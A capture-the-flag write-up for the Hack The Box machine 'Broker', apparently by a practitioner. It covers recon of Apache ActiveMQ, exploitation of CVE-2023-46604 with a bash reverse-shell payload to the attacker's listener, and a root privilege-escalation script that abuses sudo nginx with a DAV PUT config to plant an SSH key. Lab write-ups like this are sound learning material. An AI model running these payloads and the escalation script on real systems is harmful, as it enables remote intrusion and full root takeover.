HTB - Broker
Target IP: 10.129.230.87 OS: Ubuntu Linux Service: Apache ActiveMQ 5.15.15 Difficulty: Easy Author: [g1nt0n1x]
â â zbulim notation: Steps marked with â were performed automatically by zbulim, my automated recon tool. They are shown manually here for proof of concept and documentation purposes.
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery â
We run a targeted service scan against the known ports to identify running services and their versions.
nmap -p 22,80,1883,5672,8161,41101,61613,61614,61616 -sCV -Pn -oA nmap/tcp-targeted 10.129.230.87PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu) [401 Unauthorized - ActiveMQRealm]
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open http Jetty 9.4.39.v20210325 [401 Unauthorized - ActiveMQRealm]
41101/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
61614/tcp open http Jetty 9.4.39.v20210325
61616/tcp open apachemq ActiveMQ OpenWire transport 5.15.15
Port Analysis & Mapping
- 22/tcp (SSH): OpenSSH is open â once credentials or a key are obtained, shell access is possible.
- 80/tcp (HTTP): nginx returning HTTP 401 (ActiveMQRealm). Directory busting could be an option but is not urgent.
- 1883/tcp (MQTT) & 8161/tcp (HTTP): Both reference Apache ActiveMQ.
- 61616/tcp (OpenWire): Critically, this port leaks the exact ActiveMQ version: 5.15.15 â the primary attack surface.
1.2 Exploit Research â
My tool zbulim performs automated nmap scanning, directory fuzzing, and ExploitDB lookups. It identified a relevant exploit for this version of ActiveMQ.
searchsploit Apache ActiveMQ-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit) | java/remote/42283.rb
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command | windows/remote/40857.txt
Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scriptin | multiple/remote/33905.txt
Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload | windows/remote/48181.rb
Apache ActiveMQ 6.1.6 - Denial of Service (DOS) | multiple/remote/52288.py
-------------------------------------------------------------- ---------------------------------
A quick web search confirms that a public PoC for CVE-2023-46604 (ClassInfo RCE in OpenWire) is available and targets exactly this version range.
2. Phase 2: Initial Access (CVE-2023-46604)
2.1 Setting Up the Exploit
We clone the public PoC and prepare the payload. The exploit works by sending a crafted OpenWire command that causes the ActiveMQ broker to fetch and execute a remote ClassPathXmlApplicationContext XML file.
git clone https://github.com/rootsecdev/CVE-2023-46604Edit poc-linux.xml and set the reverse shell command pointing to our listener:
<value>bash -i >& /dev/tcp/10.10.16.149/9001 0>&1</value>2.2 Executing the Exploit
We host the XML payload via a Python HTTP server, set up a listener, and trigger the exploit against port 61616.
# Terminal 1: Host the XML payload
python3 -m http.server 8888
# Terminal 2: Start listener
rlwrap nc -lvnp 9001
# Terminal 3: Fire the exploit
go run main.go -i 10.129.230.87 -p 61616 -u http://10.10.16.149:8888/poc-linux.xml2.3 Shell as activemq
The listener receives a connection from the broker process.
activemq@broker:/opt/apache-activemq-5.15.15/bin$ whoami
activemq3. Phase 3: Privilege Escalation (sudo nginx)
3.1 Sudo Enumeration
As a quick win before running LinPeas, we check what the activemq user can run with elevated privileges.
sudo -lUser activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
The ability to run nginx as root without a password is highly exploitable. GTFOBins does not cover a direct shell spawn here, but running nginx as root with a custom config file allows us to expose the root filesystem or write SSH keys.
3.2 Exploiting nginx to Extract the Root SSH Key
We use a publicly known technique: craft a malicious nginx config that runs as user root, starts a DAV-enabled HTTP server on port 1339 serving /, then write our SSH public key into /root/.ssh/authorized_keys via a PUT request.
Save the following as exploit.sh on Kali and transfer it to the victim:
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1339;
root /;
autoindex on;
dav_methods PUT;
}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"Transfer and execute on the victim:
# On Kali:
python3 -m http.server 80
# On victim:
wget http://10.10.16.149/exploit.sh
chmod +x exploit.sh
./exploit.shThe script prints the generated private key â copy it to Kali as root_key:
[+] Display SSH Private Key for copy...
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktd..../wNbuPvpoXs=
-----END OPENSSH PRIVATE KEY-----
3.3 SSH as Root
Save the key locally, set correct permissions, and authenticate.
chmod 600 root_key
ssh -i root_key root@10.129.230.87root@broker:~# whoami
root
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)New things learnt
- ActiveMQ exposes its exact version over the OpenWire port (61616), making version-specific CVE lookup trivial.
- CVE-2023-46604 leverages the ClassInfo deserialization flaw â the broker fetches a remote XML file and instantiates arbitrary Java classes.
sudo nginxwith no password can be abused by crafting a custom config that runs asuser root, effectively giving full filesystem read access and enabling SSH key extraction.
Checklist added
- Check OpenWire port (61616) for version disclosure
- CVE-2023-46604 (Apache ActiveMQ RCE)
- sudo nginx privilege escalation via custom config